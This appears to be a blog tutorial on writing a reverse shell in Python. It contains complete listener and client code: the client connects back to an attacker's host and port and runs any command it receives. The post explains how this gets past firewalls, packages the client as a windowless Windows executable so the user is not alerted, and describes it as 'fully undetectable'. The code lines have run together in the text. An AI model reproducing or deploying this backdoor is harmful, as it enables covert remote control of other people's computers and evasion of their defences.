What Is A Shell
A shell is acts as an interface between the user and Operating system. You can use a shell to do many things such as view files, launch applications, check network configurations, etc. Some examples would be Powershell in Windows and the Terminal in Linux.Reverse vs Bind Shells
The reverse and bind shells both have the same purpose, to allow for remote access to a computer. The difference between the two is how the connection is initiated. A bind shell acts as a server on the target meaning the attacker has to connect to it. The reverse shell acts as a client, meaning the attacker needs to set up a server to allow the reverse shell to connect back.Why use Reverse Shells?
If both shells serve the same purpose why are reverse shells generally considered better? Reverse shells are favored more mainly due to how a firewall acts. Generally a firewall will not allow a non admin/root program to open a lower port number. They also usually attempt to stop any application that makes the computer act as a server and block any incoming connections. However, a reverse shell connects to the attacker and a firewall generally won't block outgoing connections, otherwise the user may not be able to access the net. The reverse shell has the advantages of bypassing the firewall AND running without admin/root.How the code will work
The code will utilize two standard library python modules, socket and subprocess. The attackers server will wait on a specific port for the reverse shell to connect back. Once a connection is initiated, the attacker sends a string to the reverse shell which will then take that string and execute it as a system command before returning the output. The best part is that it is FUD(Fully undetectable) as this is coded in a interpreted language. However you CAN compile the script into a windows executable using pyinstaller so it can run without the interpreter.Server Code
The code is simple enough, bind to a port and wait for a connection before looping in a send and recv pattern to send commands and recv output.import sockets = socket.socket()s.bind(('0.0.0.0',4444))s.listen(1)c, a = s.accept()print '[!]Reverse shell connected back'while True:command_to_send = raw_input('Reverse Shell > ')c.send(command_to_send)output = c.recv(99999)print '[+]Command executed remotely :n'print outputClient Code
The client code loops in an attempt to connect to the attacker before waiting for and then executing commands. You can change the ip_addr
variable to suit your servers IP and port.import socket, subprocessip_addr = '127.0.0.1'port_number = 4444s = socket.socket()while True:try:s.connect((ip_addr, port_number))breakexcept (socket.error, socket.timeout):continuewhile True:command_to_exe = s.recv(99999)result = subprocess.Popen(command_to_exe, shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)result = result.stdout.read() + result.stderr.read()s.send(result)And that's all that's needed to create a reverse shell in python.Compiling to a windows executable
Since python scripts can't run without the interpreter, you need to use a tool called pyinstaller ,which is NOT
included with the default python installation, to convert the script into a windows executable. We are going to save the client code as client.py
. Open a local system shell and type in :pyinstaller --windowed --onefile client.pyThis created a packed python executable that runs without a visible GUI window so the user is not alerted to anything suspicious.Conclusion
This is not all that the reverse shell can do. The one we coded is extremely basic. However you can code more and more complex reverse shells. I have created reverse shells that have even more functionality such as file transfer, keylogging and screenshotting. This is not all that you are limited to. If you want to see examples of much more complex reverse shells you can visit my Github Repo :https://www.github.com/angus-y/PyIris-backdoorI'm working on a project called PyIris which utilizes reverse shells that are much more complex and that can do much more than the one featured here. If your creative enough, you can make your reverse shells do anything. Since it's written in python it's FUD. Have fun, anything is possible :).